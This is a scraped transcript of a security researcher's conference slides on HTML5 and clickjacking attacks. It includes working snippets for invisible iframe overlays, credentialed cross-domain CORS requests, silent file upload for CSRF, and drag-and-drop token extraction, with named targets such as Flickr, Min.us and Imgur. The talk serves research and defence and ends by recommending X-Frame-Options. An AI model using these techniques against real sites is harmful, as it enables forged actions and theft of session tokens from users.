krzysztof kotowicz securing · same origin policy •can be relaxed though •crossdomain.xml...
TRANSCRIPT
![Page 1: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/1.jpg)
HTML5: Something wicked this way comes
Krzysztof KotowiczSecuring
1
![Page 2: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/2.jpg)
About me
• security researcher• HTML 5
• UI redressing / clickjacking
• xss-track, squid-imposter, ...
• pentester
• IT security trainer• „Hacking HTML5”
2
![Page 3: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/3.jpg)
Plan
• Same origin policy
• Exploiting users
• Attack gadgets
• Wrap-up
3
![Page 4: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/4.jpg)
Same origin policy
• the single most important security concept for the web
• restricts communication between websites from different domains
• has many flavors
• without it hell breaks loose
4
![Page 5: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/5.jpg)
Same origin policy
• can be relaxed though• crossdomain.xml
• document.domain
• HTML5 Cross Origin Resource Sharing
• or ignored...• by exploiting users
• UI redressing (clickjacking)
5
![Page 6: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/6.jpg)
Exploiting users
Users
• Like games• 100 mln play social games //goo.gl/RRWlM
• Are not security-savvy
6
![Page 8: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/8.jpg)
Combined attacks
• Gadgets• HTML5
• UI redressing
• Join them
• New attacks
8
![Page 9: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/9.jpg)
9
Gadgets
![Page 10: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/10.jpg)
Basic clickjacking
10
![Page 11: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/11.jpg)
Basic clickjacking
11
20x20 <iframe>
![Page 12: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/12.jpg)
Basic clickjacking
12
-300
-350
<iframe>
20x20
![Page 13: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/13.jpg)
Basic clickjacking
13
20x20
Victim website
Like us, plz!
<iframe>
![Page 14: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/14.jpg)
Basic clickjacking<iframe src=inner.html
width=20 height=20 scrolling=no style="opacity:0;"></iframe>
<!-- inner.html --><iframe src="//victim" width=5000 height=5000 style="position: absolute; top:-300px; left: -350px;"></iframe>
14
![Page 15: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/15.jpg)
Basic clickjacking
• Trick: Click here to see a video!
• User action: click
+ Any clickable action+Works in every browser
- X-Frame-Option
- JS framebusting
15
![Page 16: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/16.jpg)
HTML5 IFRAME sandbox
• Used to embed untrusted content• prevents XSS
• prevents defacement
• Facilitates clickjacking!
16
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="//victim"></iframe>
//html5sec.org/#122
![Page 17: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/17.jpg)
HTML5 IFRAME sandbox
+Chrome / Safari / IE 10+Will disable most JS framebusters
- X-Frame-Option
17
![Page 18: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/18.jpg)
Cross Origin Resource Sharing
• HTML5-ish
• Cross domain AJAX
• With cookies
• Blind• Unless the receiving site agrees
• Not limited to <form> syntax
• Used to trigger CSRF
18
![Page 19: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/19.jpg)
Cross Origin Resource Sharing
19
var xhr = new XMLHttpRequest(); xhr.open("POST", "http://victim", true);xhr.setRequestHeader("Content-Type", "text/plain");xhr.withCredentials = "true"; // send cookiesxhr.send("Anything I want");
![Page 20: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/20.jpg)
Cross Origin Resource Sharing
20
POST / HTTP/1.1Host: victimConnection: keep-aliveReferer: http://dev.localhost/temp/cors.phpContent-Length: 15Origin: http://dev.localhostContent-Type: text/plain...Cookie: my-cookie=myvalue
Anything I want
![Page 21: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/21.jpg)
Silent file upload
• File upload purely in Javascript
• Silent <input type=file> with any file name and content
• Uses CORS
• How? Create raw multipart/form-data
21
![Page 22: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/22.jpg)
Silent file upload
22
function fileUpload(url, fileData, fileName) { var fileSize = fileData.length, boundary = "xxxxxxxxx", xhr = new XMLHttpRequest(); xhr.open("POST", url, true); xhr.withCredentials = "true"; xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary); xhr.setRequestHeader("Content-Length", fileSize);
![Page 23: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/23.jpg)
Silent file upload
23
var body = "\--" + boundary + '\r\n\Content-Disposition: form-data;\ name="contents"; filename="' + fileName + '"\r\n\Content-Type: application/octet-stream\r\n\\r\n\' + fileData + '\r\n\--' + boundary + '--';
xhr.send(body);
![Page 24: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/24.jpg)
Silent file upload
+ No user action+ No frames+ Cross-domain, with cookies+Works in most browsers+ You can add more form fields
- CSRF flaw needed
- No access to response
24
![Page 25: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/25.jpg)
Silent file upload
DEMOFlickr.com
25
![Page 26: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/26.jpg)
Flickr.com attack toolbox
• Remember me• Flickr creates logged session on first
request
• CSRF file upload• http://up.flickr.com/photos/upload/transfer/
• accepts file uploads
• token check skipped
26
![Page 27: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/27.jpg)
Drag into
• Put attackers content into victim form
27
![Page 28: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/28.jpg)
Drag into
• Trick: Put paper in the can!
• User action: drag & drop, click
+ Inject arbitrary content+ Trigger self-XSS
- Firefox only- X-Frame-Option- JS framebusting
28
![Page 29: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/29.jpg)
Drag out content extraction
DEMOAlphabet Hero
29
![Page 30: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/30.jpg)
Drag into
Self-XSS in real life:
• wordpress 0-day (Jelmer de Hen)//goo.gl/dNYi5
• chronme.com (sneaked.net) //goo.gl/hs7Bw
• Google Code vulns (Amol Naik)//goo.gl/NxKFY
30
![Page 31: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/31.jpg)
Drag out content extraction
31
image
image
![Page 32: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/32.jpg)
Drag out content extraction
32
image
imagevictim
<iframe>
![Page 33: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/33.jpg)
Drag out content extraction
33
textarea
imagevictim
<iframe>
<textarea>
![Page 34: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/34.jpg)
Drag out content extraction
34
<div id=game style="position:relative"> <img style="position:absolute;..." src="paper.png" /> <img style="position:absolute;..." src="trash.png" /> <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."> </iframe> <textarea style="position:absolute; opacity:0;..." id=dropper></textarea> </div>
![Page 35: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/35.jpg)
Drag out content extraction
35
![Page 36: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/36.jpg)
Drag out content extraction
36
![Page 37: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/37.jpg)
Drag out content extraction
37
$("#iframe").attr('src', 'outer.html’);$('#dropper').bind('drop', function() { setTimeout(function() { var urlmatch = $("#dropper").val() .match(/token=([a-h0-9]+)$/); if (urlmatch) { var token = urlmatch[1]; // do EVIL } }, 100);});
![Page 38: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/38.jpg)
Drag out content extraction
• Trick: Put paper in the can!
• User action: drag & drop
+ Access sensitive content cross domain
- Firefox only- X-Frame-Option
- JS framebusting
38
![Page 39: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/39.jpg)
Drag out content extraction
DEMOMin.us
39
![Page 40: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/40.jpg)
Min.us attack toolbox
• CORS to create gallery
• social engineering• extract gallery editor-id from <a href>
• silent file upload to gallery
• CORS change gallery to public
• HTML5 + UI redressing combined!
40
![Page 41: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/41.jpg)
View-source
41
<iframe src="view-source:view-source:http://victim" width=5000 height=5000 style="position: absolute; top: -300px; left: -150px;"></iframe>
• Display HTML source in frame• session IDs
• tokens
• private data
![Page 42: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/42.jpg)
View-source
42
![Page 43: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/43.jpg)
View-source
43
![Page 44: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/44.jpg)
View-source
• Trick: Your serial number is...
• User action: select + drag & drop, copy-paste
+ Beats JS framebusting+ Already earned $500 from Facebook
- X-Frame-Options- Firefox only
- Complicated user action
44
![Page 45: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/45.jpg)
View-source
DEMOImgur.com
45
![Page 46: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/46.jpg)
Imgur.com attack toolbox
• framed view-source:• captcha-like string (AdSense ID)
• session ID
• social engineering:• trick to copy/paste page source
• Exploitation:• http://api.imgur.com
• cookie auth, no IP limits for session
46
![Page 47: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/47.jpg)
Summary
• UI redressing attacks are improving
• HTML5 helps exploiting vulnerabilities
• Users can be a weak link too!
Devs:Use X-Frame-Options: DENY
47
![Page 48: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/48.jpg)
Links
• html5sec.org
• code.google.com/p/html5security
• www.contextis.co.uk/research/white-papers/clickjacking
• blog.kotowicz.net
• github.com/koto
Twitter: @[email protected]
48
![Page 49: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/49.jpg)
?49